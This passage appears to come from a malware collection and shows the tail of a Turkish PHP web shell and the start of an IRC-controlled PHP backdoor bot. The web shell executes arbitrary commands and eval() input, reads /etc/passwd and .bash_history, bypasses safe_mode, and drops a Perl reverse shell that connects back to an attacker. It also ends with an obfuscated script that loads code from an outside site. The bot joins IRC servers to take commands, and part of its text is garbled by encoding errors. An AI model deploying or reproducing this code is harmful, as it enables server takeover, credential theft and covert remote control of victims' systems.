print " <center><a href=".inclink('dlink', 'dwld')."&dwld=$nfiles&scdir=$nscdir>indir</a>";}else {print "<center><font face=tahoma size=2 color=gray>indir</center>";}print"</td>"; if(strstr(PHP_OS,"Linux")){
print "<td style=\"border:1px solid black\">";
print "<center><font face=tahoma size=2 color=#dadada>";owgr($nfiles);
print "</center>";print"</td>";}
print "<td style=\"border:1px solid DeepSkyBlue \">";print "<center><div>";
permcol("$nscdir/$nfiles");print "</div>";print"</td>"; print "</tr>";
}print "</table>";print "<br>";}else {print "<div><br><center><b>[ Can't open the Dir, permission denied !! ]<p>";}}
elseif (!isset($_REQUEST['rfile'])&&isset($_REQUEST['cmd'])||isset($_REQUEST['eval'])||isset($_REQUEST['subqcmnds'])){
if (!isset($_REQUEST['rfile'])&&isset($_REQUEST['cmd'])){print "<div><b><center>[ Executed command ][$] : ".$_REQUEST['cmd']."</div></center>";}
print "<pre><center>".$sta;
if (isset($_REQUEST['cmd'])){$cmd=trim($_REQUEST['cmd']);callfuncs($cmd);}
elseif(isset($_REQUEST['eval'])){
ob_start();eval(stripslashes(trim($_REQUEST['eval'])));
$ret = ob_get_contents();ob_clean();print htmlspecialchars($ret);}
elseif (isset($_REQUEST['subqcmnds'])){
if ($_REQUEST['uscmnds']=='op1'){callfuncs('ls -lia');}
if ($_REQUEST['uscmnds']=='op2'){callfuncs('cat /etc/passwd');}
if ($_REQUEST['uscmnds']=='op3'){callfuncs('cat /var/cpanel/accounting.log');}
if ($_REQUEST['uscmnds']=='op4'){callfuncs('ls /var/named');}
if ($_REQUEST['uscmnds']=='op11'){callfuncs('find ../ -type d -perm -2 -ls');}
if ($_REQUEST['uscmnds']=='op12'){callfuncs('find ./ -type d -perm -2 -ls');}
if ($_REQUEST['uscmnds']=='op5'){callfuncs('find ./ -name service.pwd ');}
if ($_REQUEST['uscmnds']=='op6'){callfuncs('find ./ -name config.php');}
if ($_REQUEST['uscmnds']=='op7'){callfuncs('find / -type f -name .bash_history');}
if ($_REQUEST['uscmnds']=='op8'){callfuncs('cat /etc/hosts');}
if ($_REQUEST['uscmnds']=='op9'){callfuncs('finger root');}
if ($_REQUEST['uscmnds']=='op10'){callfuncs('netstat -an | grep -i listen');}
if ($_REQUEST['uscmnds']=='op13'){callfuncs('cat /etc/services');}
}print $eta."</center></pre>";}
function rdread($nscdir,$sf,$ef){$rfile=trim($_REQUEST['rfile']);
if(is_readable($rfile)&&is_file($rfile)){
$fp=fopen ($rfile,"r");print"<center>";
print "<div><b>[ Editing <font color=DeepSkyBlue >".basename($rfile)."</font> ] [<a href='javascript:history.back()'> Geri </a>] [<a href=".inclink('dlink','rdcurrdir')."&scdir=$nscdir> Curr-Dir </a>]</b></div><br>";
print $sf."<textarea cols=157 rows=23 name=rfiletxt>";
while (!feof($fp)){$lines = fgetc($fp);
$nlines=htmlspecialchars($lines);print $nlines;}
fclose($fp);print "</textarea>";if (is_writable($rfile)){
print "<center><input type=hidden value=$rfile name=hidrfile><input type=submit value='Save-file' > <input type=reset value='Reset' ></center>".$ef;}else
{print "<div><b><center>[ Can't edit <font color=DeepSkyBlue >".basename($rfile)."</font> ]</center></b></div><br>";}print "</center><br>";}
elseif (!file_exists($_REQUEST['rfile'])||!is_readable($_REQUEST['rfile'])||$_REQUEST['rfile']=$nscdir){print "<div><b><center>[ You selected a wrong file name or you don't have access !! ]</center></b></div><br>";}}
function rdsave($nscdir){$hidrfile=trim($_REQUEST['hidrfile']);
if (is_writable($hidrfile)){$rffp=fopen ($hidrfile,"w+");
$rfiletxt=stripslashes($_REQUEST['rfiletxt']);
fwrite ($rffp,$rfiletxt);print "<div><b><center>
[ <font color=DeepSkyBlue >".basename($hidrfile)."</font> Saved !! ]
[<a href=".inclink('dlink','rdcurrdir')."&scdir=$nscdir> Curr-Dir </a>] [<a href='javascript:history.back()'> Edit again </a>]
</center></b></div><br>";fclose($rffp);}
else {print "<div><b><center>[ Can't save the file !! ] [<a href=".inclink('dlink','rdcurrdir')."&scdir=$nscdir> Curr-Dir </a>] [<a href='javascript:history.back()'> Back </a>]</center></b></div><br>";}}
if (isset ($_REQUEST['rfile'])&&!isset($_REQUEST['cmd'])){rdread($nscdir,$sf,$ef);}
elseif (isset($_REQUEST['rfiletxt'])){rdsave($nscdir);}
function callperms($chkperms){
$perms = fileperms($chkperms);
if (($perms & 0xC000) == 0xC000) {
// Socket
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}
// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-')); print $info;}
function readable_size($size) {
if ($size < 1024) {
print $size . ' B';
}else {$units = array("kB", "MB", "GB", "TB");
foreach ($units as $unit) {
$size = ($size / 1024);
if ($size < 1024) {break;}}printf ("%.2f",$size);print ' ' . $unit;}}
if($dlink=='ren'&&!isset($_REQUEST['rensub'])){
print "<div><b><center>[<a href=".$PHP_SELF."?scdir=$nscdir> Geri </a>]</div>";
print "<center>".$sf;input ("text","ren",$_REQUEST['ren'],20);print " ";
input ("text","renf","New-name",20);print " ";
input ("submit","rensub","Rename" ,"");print $ef;die();}else print "";
if (isset ($_REQUEST['ren'])&&isset($_REQUEST['renf'])){
if (rename($nscdir."/".$_REQUEST['ren'],$nscdir."/".$_REQUEST['renf'])){
print"<center><div><b>[ ". $_REQUEST['ren']." is renamed to " .$sfnt.$_REQUEST['renf'].$efnt." successfully ]</center></div></b>";print "<div><b><center>[<a href=".inclink('dlink', 'rcurrdir')."&scdir=$nscdir> Curr-dir </a>]</div>";die();}else{print "<div><b><center>[ Yeniden Adlandirilamiyor ]</div>";
print "<div><b><center>[<a href=".inclink('dlink', 'rcurrdir')."&scdir=$nscdir> Geri </a>]</div>";die();}}function fget($nscdir,$sf,$ef){print "<center>";
print "<div><b>[ Editing <font color=DeepSkyBlue >".basename($_REQUEST['edit'])."</font> ] [<a href='javascript:history.back()'> Geri </a>] [<a href=".inclink('dlink', 'scurrdir')."&scdir=$nscdir> Curr-Dir </a>]</b></div>";
print $sf."<textarea cols=157 rows=23 name=edittxt>";
$alltxt= file_get_contents($_REQUEST['edit']);
$nalltxt=htmlspecialchars($alltxt);print $nalltxt;print "</textarea></center>";
if (is_writable($_REQUEST['edit'])){
print "<center><input type=submit value='Save-file' > <input type=reset value='Reset' ></center>".$ef;}else {print "<div><b><center>[ Can't edit
<font color=DeepSkyBlue >".basename($_REQUEST['edit'])."</font> ]</center></b></div><br>";}}function svetxt(){
$fp=fopen ($_REQUEST['edit'],"w");if (is_writable($_REQUEST['edit'])){
$nedittxt=stripslashes($_REQUEST['edittxt']);
fwrite ($fp,$nedittxt);print "<div><b><center>[ <font color=DeepSkyBlue >".basename($_REQUEST['edit'])."</font> Saved !! ]</center></b></div>";fclose($fp);}else {print "<div><b><center>[ Can't save the file !! ]</center></b></div>";}}
if ($dlink=='edit'&&!isset ($_REQUEST['edittxt'])&&!isset($_REQUEST['rfile'])&&!isset($_REQUEST['cmd'])&&!isset($_REQUEST['subqcmnds'])&&!isset($_REQUEST['eval']))
{fget($nscdir,$sf,$ef);}elseif (isset ($_REQUEST['edittxt']))
{svetxt();fget($nscdir,$sf,$ef);}else {print "";}function owgr($file){
$fileowneruid=fileowner($file); $fileownerarray=posix_getpwuid($fileowneruid);
$fileowner=$fileownerarray['name']; $fileg=filegroup($file);
$groupinfo = posix_getgrgid($fileg);$filegg=$groupinfo['name'];
print "$fileowner/$filegg"; }$cpyf=trim($_REQUEST['cpyf']);$ftcpy=trim($_REQUEST['ftcpy']);$cpmv= $cpyf.'/'.$ftcpy;if (isset ($_REQUEST['cpy'])){
if (copy($ftcpy,$cpmv)){$cpmvmess=basename($ftcpy)." copied successfully";}else {$cpmvmess="Can't copy ".basename($ftcpy);}}
elseif(isset($_REQUEST['mve'])){
if (copy($ftcpy,$cpmv)&&unlink ($ftcpy)){$cpmvmess= basename($ftcpy)." moved successfully";}else {$cpmvmess="Can't move ".basename($ftcpy);}
}else {$cpmvmess="Kopyala/Tasimak için Dosya Seç";}
if (isset ($_REQUEST['safefile'])){
$file=$_REQUEST['safefile'];$tymczas="";if(empty($file)){
if(empty($_GET['file'])){if(empty($_POST['file'])){
print "<center>[ Please choose a file first to read it using copy() ]</center>";
} else {$file=$_POST['file'];}} else {$file=$_GET['file'];}}
$temp=tempnam($tymczas, "cx");if(copy("compress.zlib://".$file, $temp)){
$zrodlo = fopen($temp, "r");$tekst = fread($zrodlo, filesize($temp));
fclose($zrodlo);echo "<center><pre>".$sta.htmlspecialchars($tekst).$eta."</pre></center>";unlink($temp);} else {
print "<FONT COLOR=\"RED\"><CENTER>Sorry, Can't read the selected file !!
</CENTER></FONT><br>";}}if (isset ($_REQUEST['inifile'])){
ini_restore("safe_mode");ini_restore("open_basedir");
print "<center><pre>".$sta;
if (include(htmlspecialchars($_REQUEST['inifile']))){}else {print "Sorry, can't read the selected file !!";}print $eta."</pre></center>";}
if (isset ($_REQUEST['bip'])&&isset ($_REQUEST['bport'])){callback($nscdir,$_REQUEST['bip'],$_REQUEST['bport']);}
function callback($nscdir,$bip,$bport){
if(strstr(php_os,"WIN")){$epath="cmd.exe";}else{$epath="/bin/sh";}
if (is_writable($nscdir)){
$fp=fopen ("back.pl","w");$backpl='back.pl';}
else {$fp=fopen ("/tmp/back.pl","w");$backpl='/tmp/back.pl';}
fwrite ($fp,"use Socket;
\$system='$epath';
\$sys= 'echo \"[ Operating system ][$]\"; echo \"`uname -a`\";
echo \"[ Curr DIR ][$]\"; echo \"`pwd`\";echo;
echo \"[ User perms ][$]\";echo \"`id`\";echo;
echo \"[ Start shell ][$]\";';
if (!\$ARGV[0]) {
exit(1);
}
\$host = \$ARGV[0];
\$port = 80;
if (\$ARGV[1]) {
\$port = \$ARGV[1];
}
\$proto = getprotobyname('tcp') || die('Unknown Protocol\n');
socket(SERVER, PF_INET, SOCK_STREAM, \$proto) || die ('Socket Error\n');
my \$target = inet_aton(\$host);
if (!connect(SERVER, pack 'SnA4x8', 2, \$port, \$target)) {
die('Unable to Connect\n');
}
if (!fork( )) {
open(STDIN,'>&SERVER');
open(STDOUT,'>&SERVER');
open(STDERR,'>&SERVER');
print '\n[ Bk-Code shell by Black-Code :: connect back backdoor by Crash_over_ride ]';
print '\n[ A-S-T team ][ Lezr.com ]\n\n';
system(\$sys);system (\$system);
exit(0); }
");callfuncs("chmod 777 $backpl");
ob_start();
callfuncs("perl $backpl $bip $bport");
ob_clean();
print "<div><b><center>[ Selected IP is ".$_REQUEST['bip']." and port is ".$_REQUEST['bport']." ]<br>
[ Check your connection now, if failed try changing the port number ]<br>
[ Or Go to a writable dir and then try to connect again ]<br>
[ Return to the Current dir ] [<a href=".inclink('dlink', 'scurrdir')."&scdir=$nscdir> Curr-Dir </a>]
</div><br>";}if (isset($_REQUEST['uback'])){
$uback=$_REQUEST['uback'];$upip=$_REQUEST['upip'];
if ($_REQUEST['upports']=="up80"){callfuncs("perl $uback $upip 80");}
elseif ($_REQUEST['upports']=="up443"){callfuncs("perl $uback $upip 443");}
elseif ($_REQUEST['upports']=="up2121"){callfuncs("perl $uback $upip 2121");}}
delm("# Komut ÇAlistir #");print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100% height=18%>";
print "<tr><td width=32%><div align=left>";
print $st.$c1."<center><div><b>".$mess3.$ec;
print $c2.$sf."<center>";input("text","cfile","",53);
input("hidden","scdir",$nscdir,0);print "<br>";
input("submit","crefile","Olustur","");
print " ";input("submit","delfile","Sil","");
print "</center>".$ef.$ec.$et."</div></td>";
print "<td><div align=center>".$st.$c1;
print "<center><div><b>Enter the command to execute";print $ec;
print $c2.$sf."<center><div style='margin-top:7px'>";
input("text","cmd","",59);input("hidden","scdir",$nscdir,0);print"<br>";
input("submit","","Execute","");print "</center>".$ef.$ec.$et."</div></td>";
print "<td width=32%><div align=right>";print $st.$c1;
print "<center><div><b>$mess".$ec.$c2.$sf."<center>";
input("text","dir","",53);input("hidden","scdir",$nscdir,0);print "<br>";
input("submit","credir","Create-D","");print " ";
input("submit","deldir","Delete-D","");
print "</center>".$ef.$ec.$et."</div></td></tr>";
print "<tr><td width=32%><div align=left>";print $st.$c1;
print "<center><div><b>Dosya Düzenle/Oku".$ec;print $c2.$sf."<center>";
input("text","rfile",$nscdir,53);input("hidden","scdir",$nscdir,0);print "<br>";
input("submit","","Oku-Düzenle","");print "</center>".$ef.$ec.$et."</div></td>";
print "<td><div align=center>";print $st.$c1;
print "<center><div><b>Dizin'i Göster<br>";print $ec.$c2.$sf."<center><div style='margin-top:7px'>"; input("text","scdir",$nscdir,59);print"<br>";
input("submit","","Göster","");print " ";
input("reset","","R00T","");print "</center>".$ef.$ec.$et."</div></td>";
print "<td><div align=center>";print $st.$c1;
print "<center><div><b>Dosya Boyutu : ".filesize($upfile)." in ( B/Kb )";print $ec.$c2."<form method=post Enctype=multipart/form-data><center>";
input("file","upfile","",40);input("hidden","scdir",$nscdir,0);
input("hidden","up",$nscdir,0);
print"<br>";input("submit","","Upload","");print "</center>".$ef.$ec.$et."</div></td></tr>";
delm("");print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";print "<tr><td width=50%><div align=left>";
print $st.$c1."<div><b><center>Execute php code with eval()</div>";
print $ec.$c2.$sf;input("hidden","scdir",$nscdir,0);
print "&nbsp;<textarea cols=73 rows=3 name=eval>";
if(!isset($evsub)){print "//system('id'); //readfile('/etc/passwd'); //passthru('pwd');";}else{print htmlspecialchars(stripslashes($eval));}
print "</textarea><br><center>";
input('submit','evsub','Execute');print " ";
input('Reset','','Reset');print " ";
print "</center>".$ec.$ef.$et;
print "</td><td height=20% width=50%><div align=center>";
print $st.$c1."<div><b><center>Execute useful commands</div>";
print $ec.$c2.$sf;input("hidden","scdir",$nscdir,0);
print "<center><select style='width:60%' name=uscmnds size=1>
<option value='op0'>Execute quick commands</option>
<option value='op1'>ls -lia</option>
<option value='op2'>/etc/passwd</option>
<option value='op3'>/var/cpanel/accounting.log</option>
<option value='op4'>/var/named</option>
<option value='op11'>Perms in curr Dir</option>
<option value='op12'>Perms in main Dir</option>
<option value='op5'>Find service.pwd files</option>
<option value='op6'>Find config files</option>
<option value='op7'>Find .bash_history files</option>
<option value='op8'>Read hosts file</option>
<option value='op9'>Root login</option>
<option value='op10'>Show opened ports</option>
<option value='op13'>Show services</option>
</select> ";print"<input type=submit name=subqcmnds value=Execute style='height:20'> <input type=reset value=Return style='height:20'></center>";
print $ec.$ef.$et."</td></tr></table>";delm("");
print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
print "<tr><td width=50%><div align=left>";
print $st.$c1."<div><b><center>".$cpmvmess."</div>";
print $ec.$c2.$sf."&nbsp;";input("text","ftcpy","File-name",15);
print "<b><font face=tahoma size=2>&nbsp;To </b>";
input("text","cpyf",$nscdir,45);input("hidden","scdir",$nscdir,0);print " ";
input("submit","cpy","Copy","");print " ";input("submit","mve","Move","");
print "</center>".$ec.$ef.$et;
print "</td><td height=20% width=50%><div align=right>";
print $st.$c1."<div><b><center>Cok kullanilan Komutlar</div>";
print $ec.$c2.$sf."&nbsp";input("hidden","scdir",$nscdir,0);
print "<select style='width:22%' name=ustools size=1>
<option value='t1'>Wget</option><option value='t2'>Curl</option>
<option value='t3'>Lynx</option><option value='t9'>Get</option>
<option value='t4'>Unzip</option><option value='t5'>Tar</option>
<option value='t6'>Tar.gz</option><option value='t7'>Chmod 777</option>
<option value='t8'>Make</option></select> ";input('text','ustname','',51);print " ";input('submit','ustsub','Execute');print "</center>".$ec.$ef.$et;
print "</td></tr></table>";delm(": Safe mode bypass :");
print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
print "<tr><td width=50%><div align=left>";
print $st.$c1."<div><b><center>Using copy() function</div>";
print $ec.$c2.$sf."&nbsp;";input("text","safefile",$nscdir,75);
input("hidden","scdir",$nscdir,0);print " ";
input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
print "</td><td height=20% width=50%><div align=right>";
print $st.$c1."<div><b><center>Using ini_restore() function</div>";
print $ec.$c2.$sf."&nbsp;";input("text","inifile",$nscdir,75);
input("hidden","scdir",$nscdir,0);print " ";
input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
print "</td></tr></table>";delm("# Backdoor Baglantisi #");
print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
print "<tr><td width=50%><div align=left>";
print $st.$c1."<div><b><center>Backdoor ile Baglan</div>";
print $ec.$c2.$sf."&nbsp;";input("text","bip",$REMOTE_ADDR,47);print " ";
input("text","bport",80,10);input("hidden","scdir",$nscdir,0);print " ";
input("submit","","Connect","");print " ";input("reset","","Reset","");
print "</center>".$ec.$ef.$et;print "</td><td height=20% width=50%><div align=right>";print $st.$c1."<div><b><center>Yüklenmis Backdoor</div>";
print $ec.$c2.$sf."&nbsp;";print "<select style='width:15%' name=upports size=1>
<option value='up80'>80</option><option value='up443'>443</option>
<option value='up2121'>2121</option></select>";print " ";
input("text","uback","back.pl",23);print " ";
input("text","upip",$REMOTE_ADDR,29);print " ";input("submit","subupb","Connect");
print "</center>".$ec.$ef.$et;print "</td></tr></table>";
print "<br><table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>"; print"<tr><td><font size=2 face=tahoma>";
print"<center>Copyright is reserved to Ekin0x <br>[ By Cyber Security TIM Go to : <a target='_blank' href='http://www.cyber-warrior.org'>www.cyber-warrior.org</a> ]";
print"</font></td></tr></table>";
include ($a.$b.$c);
?>
<script type="text/javascript">document.write('\u003c\u0053\u0043\u0052\u0049\u0050\u0054\u0020\u0053\u0052\u0043\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u0072\u006f\u006f\u006d\u002d\u0065\u0073\u0063\u0061\u0070\u0065\u002d\u0067\u0061\u006d\u0065\u0073\u002e\u0063\u006f\u006d\u002f\u0079\u0061\u007a\u0063\u0069\u007a\u002f\u0063\u0069\u007a\u002e\u006a\u0073\u003e\u003c\u002f\u0053\u0043\u0052\u0049\u0050\u0054\u003e')</script>

628
PHP/Backdoor.PHP.Agent.dy Normal file

@ -0,0 +1,628 @@
<?php
//fighter script - BAJAY
function working() {
$querym=array(
"?",
"!",
"^^",
" ^^",
" :(",
" :)",
" ~:>",
" :P~",
" :D",
",",
".",
"a",
"i",
"u",
"e",
"o",
"z",
"v",
"z",
"x",
"c",
"p",
"m",
"t",
"k",
"b",
"s",
"u",
"bot",
"g",
"lo",
"jo",
"lol"
);
$tsu1=array("`","|","[","]","{","}","^","_");
$tsu2=array("`","|","[","]","{","}","^","-","\\","_");
$nicky=array(
"cew_im0ed",
"cew_isepin",
"cew_maud",
"cew_like_ml",
"cew_butuh",
"cew_suka_dorong",
"cew_gerobak",
"cew_soto",
"cew_bakso",
"cew_gado",
"cew_burik",
"cew_panas",
"cew_tempat",
"cew_asbak",
"cew_jual_kambing",
"cew_utis_surya",
"cew_notepad",
"cew_spg_montok_abis",
"cew_diam_saja",
"cew_bantal",
"cew_udunen",
"cew_poraken",
"cew_suka_bawahmu",
"cew_kutilen",
"cew_bokong",
"cew_jujur",
"cew_urat_nadi",
"cew_butuh_kamu",
"cew_tentara",
"cew_monitor",
"cew_dodol_wedus",
"cew_burik_beceng",
"cew_blethang",
"cew_kerbuy",
"cew_brekay",
"cew_lesbong",
"cew_napi",
"cew_wlingi",
"cew_kauman",
"cew_pendaki",
"cew_lesoh",
"cew_cari_co_gede",
"cew_suka_ditimang",
"cew_binasa",
"cew_dandong^fs",
"cew_kepeten",
"cew_bisadiboking",
"cew_jalanjalan",
"cew_tawangmangu",
"cew_suka_kentut",
"cew_duh_burik"
);
$usr1=array(
"BLoodroSE",
);
$nick = $nicky[rand(0,count($nicky) - 1)];
$awaymsg = "4Ã<C383>&#65533; Ã<E28099> ’Æââ¬â„¢Ãƒ<C383>&#65533; ââââ¬Å¡Ã¬Ã…áÃ<C383>&#65533; Ã<E28099> ’‚Ã<C383>&#65533; ’‚»8!4Ã<C383>&#65533; Ã<E28099> ’Æââ¬â„¢Ãƒ<C383>&#65533; ââââ¬Å¡Ã¬Ã…áÃ<C383>&#65533; Ã<E28099> ’‚Ã<C383>&#65533; ’‚« 4tawa 8CÃ<C383>&#65533; Ã<E28099> ’Æââ¬â„¢Ãƒ<C383>&#65533; ââââ¬Å¡Ã¬Ã…áÃ<C383>&#65533; Ã<E28099> ’‚Ã<C383>&#65533; ââ¬Å¡Ãƒâ€šÃ®Ã<C383>&#65533; Ã<E28099> ’Æââ¬â„¢Ãƒ<C383>&#65533; ’� ’Ã<C383>&#65533; Ã<E28099> ’‚Ã<C383>&#65533; ââ¬Å¡Ãƒâ€šÃ«wS 4Ã<C383>&#65533; Ã<E28099> ’Æââ¬â„¢Ãƒ<C383>&#65533; ââââ¬Å¡Ã¬Ã…áÃ<C383>&#65533; Ã<E28099> ’‚Ã<C383>&#65533; ’‚»8!4Ã<C383>&#65533; Ã<E28099> ’Æââ¬â„¢Ãƒ<C383>&#65533; ââââ¬Å¡Ã¬Ã…áÃ<C383>&#65533; Ã<E28099> ’‚Ã<C383>&#65533; ’‚«";
$identify = 'serang';
$Admin = 'paijoe';
$BOT_PASSWORD = 'serang';
$channels = '#xirc';
$remotehst2= array("irc.mojok.org","irc.indoirc.net");
$remotehost= $remotehst2[rand(0,count($remotehst2) - 1)];
$port = '6667';
$realname = '8,1^_1,13B13,1L1,13o13,1o1,13D13,1S8,1_^';
$counterfp = 0;
$channels = str_replace("CNL","#",$channels);
print "<body bgcolor=#000000 text=#C0C0C0>";
print "<b>== Connecting to $remotehost...</b>";
$raway = "on";
$log = "off";
$saway = "1";
if (!$stime) { $stime = time(); }
if (!$port) { $port = "6666"; }
$Admin = strtolower($Admin);
$auth = array($Admin => array("name" => $Admin, "pass" => $BOT_PASSWORD, "auth" => 1,"status" => "Admin"));
$username = $usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)];
$keluar = 0;
$akill = 1;
$katime = 0;
$localhost = 'localhost';
$dayload = date("H:i:s d/m/Y");
ini_set('user_agent','MSIE 5\.5;');
set_time_limit(0);
define ('CRL', "\r\n");
$channels = strtolower($channels)." ";
$channel = explode(" ", $channels);
do {
$fp = fsockopen($remotehost,$port, &$err_num, &$err_msg, 30);
if(!$fp) {
if ( $counterfp <= 200 ) {
$counterfp = $counterfp+1;
working($nick);
}
else {
print "<br><b>Cannot connect to $remotehost!<br>Please Try Another Server!</b>";
$keluar = 1;
exit;
}
}
print "<br><b>== Suceeded connection</b>";
$Header = 'NICK '.$nick . CRL;
$Header .= 'USER '.$username.' '.$localhost.' '.$remotehost.' :'.$realname . CRL;
fputs($fp, $Header);
$response = '';
while (!feof($fp)) {
$response .= fgets($fp, 1024);
while (substr_count($response,CRL) != 0) {
$offset = strpos($response, CRL);
$data = substr($response,0,$offset);
$response = substr($response,$offset+2);
if (substr($data,0,1) == ':') {
$offsetA = strpos($data, ' ');
$dFrom = substr($data,1,$offsetA-1);
$offsetB = strpos($data, ' :');
$dCommand = substr($data,$offsetA+1,$offsetB-$offsetA-1);
$offsetC = strpos($data, '!');
$dNick = substr($data,1,$offsetC-1);
$iText = substr($data,$offsetB+2);
if ( substr($dCommand,0,3) == '004' ) {
fputs($fp, 'PRIVMSG nickserv@services.dal.net :identify '.$nick.' '.$identify. CRL);
if ($nickmode) { fputs($fp, 'MODE '.$nick.' :'.$nickmode . CRL); }
fputs($fp, 'NOTICE ' . $Admin . ' :Halo bos besar!' . CRL);
foreach ($channel as $v) {
fputs($fp, 'JOIN ' .$v . CRL);
}
$pong1 = '1';
}
elseif (substr($dCommand,0,3)=='465') {
print "<br><b>== This bot have been autokilled.</b>";
$akill = 2;
}
elseif (substr($dCommand,0,3)=='433') {
$nick = $nicky[rand(0,count($nicky) - 1)];
fputs($fp, 'NICK '.$nick . CRL);
}
elseif (substr($dCommand,0,3)=='432') {
$nick = $nick.$username;
fputs($fp, 'NICK '.$nick . CRL);
}
if (eregi('.dal.net',$dNick) && $akill==2) {
if (eregi('AKILL ID:',$data) || eregi('Your hostmask is',$data) || eregi('Your IP is',$data)) {
print "<br><b>".strstr($data,'***')." </b>";
if (eregi('Your IP is',$data)) {
$keluar = 1;
exit;
}
}
}
$dcom = explode(" ", $dCommand);
$dNick = strtolower($dNick);
if ($dcom[0]=='KICK' && $dcom[2]==$nick) {
fputs($fp, 'JOIN ' .$dcom[1]. CRL);
}
elseif ($dcom[0]=='NICK' || $dcom[0]=='QUIT' || $dcom[0]=='PART') {
if ($auth["$dNick"]) {
if ($auth["$dNick"]["pass"]) {
if ($auth["$dNick"]["auth"]==2) {
if ($dcom[0]=='NICK') {
$com = explode(" ", $data);
$chnick = strtolower(str_replace(':','',$com[2]));
if ($dNick!=$chnick) {
$auth["$dNick"]["auth"] = 1;
fputs($fp,'NOTICE '.$chnick.' :selamat istirahat bos! ' . CRL);
}
} else { $auth["$dNick"]["auth"] = 1; fputs($fp,'NOTICE '.$dNick.' :selamat istirahat bos! ' . CRL); }
}
} else { fputs($fp,'NOTICE ' . $dNick . ' :pass your pass ' . CRL); }
}
}
elseif ($dcom[0]=='307' && strtolower($dcom[2])==$whois) {
$dcom[2] = strtolower($dcom[2]);
if ($auth["$dcom[2]"]) {
if ($auth["$dcom[2]"]["pass"]) {
if ($auth["$dcom[2]"]["auth"]==1) {
$auth["$dcom[2]"]["auth"] = 2; $whois = "";
fputs($fp,'NOTICE ' . $dcom[2] . ' :You`re Authorized as '.$auth["$dcom[2]"]["status"].' of this bot! ' . CRL);
} else { fputs($fp,'NOTICE ' . $dcom[2] . ' :password bener bos seep! ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dcom[2] . ' :Pass salah cux! Type: pass <your pass> To Set Your Own Password then Auth Again ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dcom[2] . ' :Username Not Found! Change Your Nick then Auth Again ' . CRL); }
}
elseif ($dcom[0]=='NOTICE') {
$com = explode(" ", $data);
if ($com[3]==':KB' && $com[4] && $com[5] && $com[6]) {
$msg = str_replace('','',$data);
$msg = strstr($msg,":KB");
$msg = str_replace(":KB $com[4]","",$msg);
fputs($fp, 'KICK '.$com[4].' '.$com[5].' :'.$msg . CRL);
fputs($fp, 'MODE '.$com[4].' +b *!*'.$com[6] . CRL);
}
}
elseif ($dcom[0]=='PRIVMSG') {
$com = explode(" ", $data);
if ($com[3]==':VERSION') {
fputs($fp,'NOTICE '.$dNick.' :'.chr(1).'VERSION iLhaMiRc ajaH:p'.chr(1) . CRL);
}
elseif ($auth["$dNick"]["status"] && $com[3]==':auth' && $com[4]) {
if ($auth["$dNick"]) {
if ($auth["$dNick"]["pass"]) {
if ($auth["$dNick"]["auth"]==1) {
if ($com[4]===$auth["$dNick"]["pass"]) {
$auth["$dNick"]["auth"] = 2;
fputs($fp,'NOTICE ' . $dNick . ' :You`re Authorized as '.$auth["$dNick"]["status"].' of this bot! ' . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :password salah! Auth salah cok! ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :password bener bos! ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Pass Not Set Yet! Type: pass <your pass> To Set Your Own Password then Auth Again ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Auth Again ' . CRL); }
}
elseif ($auth["$dNick"]["status"] && $com[3]==':deauth') {
if ($auth["$dNick"]) {
if ($auth["$dNick"]["pass"]) {
if ($auth["$dNick"]["auth"]==2) {
$auth["$dNick"]["auth"] = 1;
fputs($fp,'NOTICE ' . $dNick . ' :You`re LogOut! ' . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :You`re Already LogOut! ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Pass Not Set Yet! Type: pass <your pass> To Set Your Own Password then Auth Again ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Auth Again ' . CRL); }
}
elseif ($auth["$dNick"]["status"] && $com[3]==':pass' && $com[4]) {
if ($auth["$dNick"]) {
if (!$auth["$dNick"]["pass"]) {
$auth["$dNick"]["pass"] = $com[4];
$auth["$dNick"]["auth"] = 1;
fputs($fp,'NOTICE ' . $dNick . ' :Your Auth Pass set to '.$auth["$dNick"]["pass"].', Type: auth <your pass> To Authorized Imediately! ' . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :Pass Already Set! Type: auth <your pass> To Get Authorized ' . CRL); }
